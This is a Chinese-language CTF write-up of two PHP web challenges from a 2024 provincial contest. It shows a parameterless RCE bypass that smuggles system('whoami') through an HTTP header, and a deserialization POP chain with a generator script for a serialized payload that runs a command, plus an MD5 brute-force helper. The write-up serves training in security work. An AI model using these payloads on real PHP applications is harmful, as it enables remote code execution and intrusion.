2024浙江省省赛决赛wp

rce

`<?php   echo "get只接受code欧,flag在上一级目录<br>";   $filename = __FILE__;   highlight_file($filename);   if(isset($_GET['code'])){       if (!preg_match('/session_id\(|readfile\(/i', $_GET['code']))           {           if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['code'])) {                   @eval($_GET['code']);               }                 }       else{           die("不让用session欧，readfile也不行");       }   }   ?>`

无参rce过滤了readfile和session_id方法我用的是这个

GET /1.php?code=eval(next(getallheaders())); HTTP/1.1Host: 172.28.13.107Priority: u=0, iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:143.0) Gecko/20100101 Firefox/143.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateUpgrade-Insecure-Requests: system('whoami');

比赛的时候不知道是不是apache诶这个方法只能是apache的
用get_define_class也行这个通用

unserialize

<?php# 源码highlight_file(__FILE__);error_reporting(0);class AAA{    public $aear;    public $string;    public function __construct($a){        $this -> aear = $a;    }    function __destruct()    {        echo $this -> aear;    }    public function __toString()    {        $new = $this -> string;        return $new();    }}class BBB {    private $pop;    public function __construct($string) {        $this -> pop = $string;    }    public function __get($value) {        $var = $this -> $value;        $var[$value]();    }}class DDD{    public $bag;    public $magazine;    public function __toString()    {        $length = @$this -> bag -> add();        return $length;    }    public function __set($arg1,$arg2)    {        if($this -> magazine -> tower)        {            echo "really??";        }    }}class EEE{    public $d=array();    public $e;    public $f;    public function __get($arg1){        $this->d[$this->e]=1;        if ($this->d[]=1){            echo 'nononononnnn!!!';        }        else{            eval($this->f);        }    }}class FFF{    protected $cookie;    protected function delete() {        return $this -> cookie;    }    public function __call($func, $args) {        echo 'hahahhhh';        call_user_func([$this, $func."haha"], $args);    }}class GGG{    public $green;    public $book;    public function __invoke(){        if(md5(md5($this -> book)) == 666) {            return $this -> green -> pen;        }    }}if(isset($_POST['UP'])) {    unserialize($_POST['UP']);}

调用链为

AAA::__destruct()->AAA::__toString()->GGG::invoke()->EEE::get()

但是最后一个地方的有一个判断就是

if ($this->d[]=1){            echo 'nononononnnn!!!';        }

要让这个判断为false让d为NAN即可我们做个实验

再写个MD5爆破脚本

import hashlib
def crack(pre):for i in range(0, 999999):a=hashlib.md5(str(i).encode("UTF-8")).hexdigest()if(hashlib.md5(str(a).encode("UTF-8")).hexdigest()[0:3])==str(pre):print(i)
crack("666")

 <?php
# 源码
highlight_file(__FILE__);
error_reporting(0);
class AAA{public $aear;public $string;public function __construct($a){$this -> aear = $a;}}class BBB {private $pop;}class DDD{public $bag;public $magazine;}class EEE{public $d=array();public $e;public $f;}class FFF{protected $cookie;}
class GGG{public $green;public $book;}$eee=new EEE();
$eee->d=NAN;
$eee->e=NAN;
$eee->f="system('whoami');";
$ggg=new GGG();
$ggg->green=$eee;
$ggg->book='213';
$aaaa = new AAA();
$aaaa->string = $ggg;
$aaa = new AAA($aaaa);
echo urlencode(serialize($aaa));![图片](https://img2024.cnblogs.com/blog/3660992/202510/3660992-20251017085509688-2138691162.png)